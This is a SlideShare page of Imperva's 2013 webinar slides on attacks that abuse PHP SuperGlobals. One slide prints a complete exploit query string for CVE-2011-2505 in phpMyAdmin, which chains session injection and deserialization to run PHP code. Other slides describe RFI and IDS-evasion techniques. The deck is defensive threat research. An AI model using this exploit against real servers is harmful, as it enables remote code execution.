SlideShare a Scribd company logo

PHP SuperGlobals: Supersized Trouble

Imperva
Imperva

The document discusses PHP SuperGlobals and how they can be exploited in web applications. It begins with background on PHP and SuperGlobals. It then details how attackers can abuse SuperGlobals like $_SESSION to execute arbitrary code on vulnerable sites like PHPMyAdmin. The document concludes by noting the importance of positive security models and layered defenses to mitigate SuperGlobal and other attacks.

Technology
1 of 37
Download to read offline
© 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble Confidential1 Tal Be’ery, Web Security Research Team Leader
© 2013 Imperva, Inc. All rights reserved. Agenda Confidential2 §  Introduction •  Relevant PHP background §  An anatomy of a modern web exploit •  Abusing SuperGlobals §  Additional PHP SuperGlobal attacks •  In the wild §  Summary & conclusions §  Q&A
© 2013 Imperva, Inc. All rights reserved. HII Reports Confidential3 §  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice •  A different approach from vulnerability research §  Data set composition •  ~60 real world applications •  Anonymous Proxies §  More than 24 months of data §  Powerful analysis system •  Combines analytic tools with drill down capabilities
© 2013 Imperva, Inc. All rights reserved. Tal Be’ery,Web Research Team Leader Confidential4 §  Web Security Research Team Leader at Imperva §  Holds MSc & BSc degree in CS/EE from TAU §  10+ years of experience in IS domain §  Facebook “white hat” §  Speaker at RSA, BlackHat, AusCERT §  Columnist for securityweek.com §  CISSP
© 2013 Imperva, Inc. All rights reserved. Introduction Confidential5 Relevant PHP Background
© 2013 Imperva, Inc. All rights reserved. §  The most popular server-side programming language in the world: §  And goes from strength to strength Breadth and Depth of PHP - I Confidential6
© 2013 Imperva, Inc. All rights reserved. §  The most popular web applications are powered by PHP Breadth and Depth of PHP – II http://www.alexa.com/topsites Confidential7
© 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals Confidential8 §  Most programing languages support different scopes for variables, primarily the “local” and the “global” scope. §  Global variables •  Provide a simple channel for cross-function communication •  More risky, as *ANY* function may change them §  PHP has several predefined variables that are called SuperGlobals. §  SuperGlobals provide access to the server’s core functionality – cookies, sessions, environment, etc. §  SuperGlobals variables are available to the PHP script in all scopes, with no need for explicit declaration.
© 2013 Imperva, Inc. All rights reserved. PHP SuperGlobal List Confidential9   Variable   Definition   1   GLOBALS   References all variables available in global scope   2   _SERVER   Server and execution environment information   3   _GET   HTTP GET variables   4   _POST   HTTP POST variables   5   _FILES   HTTP File upload variables   6   _COOKIE   HTTP Cookies   7   _SESSION   Session variables   8   _REQUEST   HTTP Request variables   9   _ENV   Environment variables  
© 2013 Imperva, Inc. All rights reserved. External Variable Modification: A PHP Specific Weakness Confidential10 §  MITRE had assigned a specific CWE (Common Weakness Enumeration) code for the External Variable Modification weakness: CWE-473 §  “A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies”. §  SuperGlobals are a natural target: •  Exist in every PHP application •  Provide access to the server’s core functionality
© 2013 Imperva, Inc. All rights reserved. Anatomy of a Modern Web Exploit Confidential11 Exploiting SuperGlobals
© 2013 Imperva, Inc. All rights reserved. PHPMyAdmin (PMA) Confidential12 §  The most popular MySQL administration tool for PHP §  Often is bundled by default in LAMP (Linux, Apache, MySQL, PHP) installations
© 2013 Imperva, Inc. All rights reserved. CVE-2011-2505: PhpMyAdmin Vulnerability Confidential13 §  PhpMyAdmin’s Unset session functionality §  Parse_str() : parses the given query string and stores the variables in the current scope. As a result, *ALL* request variables are imported into the function’s local scope. §  Session_write_close(): Makes Session data persistent throughout the entire user’s session. Session data is implicitly written to a local file on the server.
© 2013 Imperva, Inc. All rights reserved. CVE-2011-2505: Exploit Confidential14 §  An attacker can now •  Craft a malicious query string with the _SESSION SuperGlobal •  Injected _SESSION value overrides the session’s original values •  New values are saved to local file
© 2013 Imperva, Inc. All rights reserved. Serialization Explained Confidential15 §  The process of saving data stored in memory to file is called “serialization” §  The process of loading data stored in file to memory is called “deserialization” Source: http://www.studytonight.com/java/images/Serialization-deserialization.JPG
© 2013 Imperva, Inc. All rights reserved. §  Discovered by Stefan Esser - Late 2010 §  Attacker can write data to the session in *ANY* format, if the session variable name starts with ‘!’ CVE-2010-3065 PHP Vulnerability & Exploit Confidential16
© 2013 Imperva, Inc. All rights reserved. PMA Session Deserialization: Vulnerability Confidential17 §  On session deserialization, the load() function is called §  Eval is evil! •  Can be used to execute unexpected code §  But in order to exploit, attackers need to first specify a valid source (= session filename )
© 2013 Imperva, Inc. All rights reserved. Guessing Session Filename: Theory Confidential18 §  Luckily for the attacker, the location of the session file is predictable §  Session file name consists of •  The “sess_” prefix •  The session identifier – known to the user/attacker §  File’s path is predictable •  default values
© 2013 Imperva, Inc. All rights reserved. Guessing Session Filename: In the Wild Confidential19 §  Multiple guesses for path the same session file (“sess_19qq…”)
© 2013 Imperva, Inc. All rights reserved. The Final Exploit Confidential20 §  Now the attackers can, *FINALLY*, get their code evaluated §  /phpMyAdmin/index.php?session_to_unset=123& token=86498ff0a666f808df76ffaabee9b7a3& _SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1: {s:6:“source";s:59:"/var/lib/php5/ sess_6a3e0376fbfe9797081a 3ee202ef1ca85c451a62";}}& _SESSION[payload]=<?php phpinfo(); ?>
© 2013 Imperva, Inc. All rights reserved. Exploit Result Confidential21 §  Arbitrary PHP code is executed
© 2013 Imperva, Inc. All rights reserved. PMA SuperGlobal Attacks In the Wild Confidential22 §  Attacks source is a hacked server §  Attacks (at least) two other servers §  Attacks persist over half a year
© 2013 Imperva, Inc. All rights reserved. A Modern Exploit Summary: Research Confidential23 §  Sophisticated research §  Combines multiple vulnerabilities and issues in multiple domains •  PHPMyAdmin (PMA) •  PHP internals
© 2013 Imperva, Inc. All rights reserved. A Modern Exploit Summary: Development Confidential24 §  Exploit packed in a single, “click once” PHP script §  Automates the different attack stages §  Can be launched from infected servers to infect others
© 2013 Imperva, Inc. All rights reserved. Additional PHP SuperGlobal Attacks Confidential25 In the Wild
© 2013 Imperva, Inc. All rights reserved. SuperGlobal Attacks Targets – I Confidential26 §  Specific vulnerabilities exploit – such as the previously discussed PMA attack §  RFI (Remote File Inclusion): trying to overwrite “Server[document_root]” to point to external resource
© 2013 Imperva, Inc. All rights reserved. SuperGlobal Attacks Targets – II Confidential27 §  Part of general scanning against the site – Nikto, Acunetix, Nessus §  IDS filter evasion: SuperGlobal Provide an alternative way to represent HTTP query parameters •  “_REQUEST[Itemid]=1” request parameter is equivalent to “Itemid=1” in every way •  However, it evades a naïve IDS signature that blacklists “Itemid=1” •  We have seen these evasion technique applied on several CVEs
© 2013 Imperva, Inc. All rights reserved. SuperGlobals In the Wild Confidential28 §  During May 2013: §  3.5K requests that manipulated PHP SuperGlobal variables. §  27 different attack sources §  24 web applications as targets
© 2013 Imperva, Inc. All rights reserved. Targeted SuperGlobal Confidential29 §  Some SuperGlobals are more targeted than others §  The more targeted SuperGlobals provide access to more sensitive resources GLOBALS 55% ENV 14% SERVER 14% SESSION 13% REQUEST 4%
© 2013 Imperva, Inc. All rights reserved. Summary & Conclusions Confidential30
© 2013 Imperva, Inc. All rights reserved. The Importance of a Positive Security Model Confidential31 §  The essence of the external variable manipulation weakness: the attacker has the ability to send out external parameters with the same name of internal variables, and thus override the value of the latter. §  External parameters are not part of the standard interface of the targeted application §  Blocking all of the internal variables’ names might be difficult with a negative security approach §  But trivial with a positive security mechanism that specifies the allowed parameter names for each resource
© 2013 Imperva, Inc. All rights reserved. Layered Application Layer Mechanisms Confidential32 §  Bad news: attackers can create a complex exploit by combining several vulnerabilities together §  Good news: it’s enough to break one of the links in the kill chain to break the chain altogether . §  Application layer solution that combines multiple detection mechanisms: •  Positive security model •  Negative security model for generic issues (generic directory traversal protection for this case) •  Specific CVE detection, is crucial for effective mitigations of such complex attacks.
© 2013 Imperva, Inc. All rights reserved. Third-Party Code Perils Confidential33 §  Attackers target popular applications such as the PhpMyAdmin (PMA) utility installation. §  PMA is often bundled with other applications. §  Having this vulnerable utility present on the server, even if it is not being used, exposes the server to code execution attacks. §  Since administrators are not necessarily aware of all the bundled software, an “opt out” security model is needed. §  A way to achieve such an “opt out” security model is by deploying a Web Application Firewall (WAF) with constant updates of security content.
© 2013 Imperva, Inc. All rights reserved. SuperGlobal Parameters In Requests Should Be Blocked Confidential34 §  There is no reason for these parameters to be present in valid requests, they should be banned. §  Imperva’s WAF customers received a content update to their Web Application Firewall on January 15th 2013.
© 2013 Imperva, Inc. All rights reserved. Summing Up Confidential35 §  Establish a positive security model §  Use layered application layer security mechanisms §  Beware of third-party code perils §  Block SuperGlobal parameters in requests
© 2013 Imperva, Inc. All rights reserved. Webinar Materials Confidential36 Post-Webinar Discussions Answers to Attendee Questions Webinar Recording Link Join Group Join Imperva LinkedIn Group, Imperva Data Security Direct, for…
© 2013 Imperva, Inc. All rights reserved. www.imperva.com Confidential37

Recommended

SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
EC-Council
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building Better
Equal Experts
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
Jayesh Patel
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
Siddharth Bezalwar
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
PRISMA CSI
 
10 Mistakes Hackers Want You to Make
10 Mistakes Hackers Want You to Make10 Mistakes Hackers Want You to Make
10 Mistakes Hackers Want You to Make
Joe Kutner
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 

Recommended

SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
EC-Council
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building Better
Equal Experts
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
Jayesh Patel
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
Siddharth Bezalwar
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
PRISMA CSI
 
10 Mistakes Hackers Want You to Make
10 Mistakes Hackers Want You to Make10 Mistakes Hackers Want You to Make
10 Mistakes Hackers Want You to Make
Joe Kutner
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Shamoon
ShamoonShamoon
Shamoon
Shakacon
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
Victor Bucutea
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
Mike Saunders
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application Security
Chong-Kuan Chen
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
Isuru Samaraweera
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
SecuRing
 
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat Security Conference
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
Sunny Neo
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability Detection
PRISMA CSI
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
Aditya K Sood
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
Red Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWSRed Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWS
Priyanka Aash
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
Binu Ramakrishnan
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
OWASP
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
Imperva Incapsula
 
Hiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known VulnerabilitiesHiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known Vulnerabilities
Imperva
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
Mohmad Feroz
 

More Related Content

What's hot

CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat Security Conference
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
Aditya K Sood
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 

What's hot (20)

Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Shamoon
ShamoonShamoon
Shamoon
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application Security
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability Detection
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Red Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWSRed Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWS
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
 

Similar to PHP SuperGlobals: Supersized Trouble

Hiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known VulnerabilitiesHiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known Vulnerabilities
Imperva
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
Philippe Gamache
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
Philippe Gamache
 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack Survival
Imperva
 
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
WilheminaRossi174
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous DeliveryBetter Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
Gene Gotimer
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
Coveros, Inc.
 

Similar to PHP SuperGlobals: Supersized Trouble (20)

Hiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known VulnerabilitiesHiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known Vulnerabilities
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January Meetup
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
Runtime Protection in the Real World
Runtime Protection in the Real WorldRuntime Protection in the Real World
Runtime Protection in the Real World
 
Security misconfiguration
Security misconfigurationSecurity misconfiguration
Security misconfiguration
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsProtecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack Survival
 
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
Chapter 4Secure Design PrinciplesCopyright © 2014 by McGraw-
 
Security misconfiguration
Security misconfigurationSecurity misconfiguration
Security misconfiguration
 
Securing Java in the Server Room
Securing Java in the Server RoomSecuring Java in the Server Room
Securing Java in the Server Room
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous DeliveryBetter Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
 
The Top 10 Most Common Weaknesses in Serverless Applications 2018
The Top 10 Most Common Weaknesses in Serverless Applications 2018The Top 10 Most Common Weaknesses in Serverless Applications 2018
The Top 10 Most Common Weaknesses in Serverless Applications 2018
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present Dangers
 
API Roles In Cloud and Mobile Security - Greg Olsen, IT Manager, Integration ...
API Roles In Cloud and Mobile Security - Greg Olsen, IT Manager, Integration ...API Roles In Cloud and Mobile Security - Greg Olsen, IT Manager, Integration ...
API Roles In Cloud and Mobile Security - Greg Olsen, IT Manager, Integration ...
 

More from Imperva

Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to Narratives
Imperva
 

More from Imperva (20)

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 Survey
 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
 
Imperva ppt
Imperva pptImperva ppt
Imperva ppt
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked account
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to Narratives
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over Lunch
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber Security
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPR
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet Sophistication
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made Easy
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense Report
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat Intelligence
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR Plan
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your Data
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data Security
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
 

Recently uploaded

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
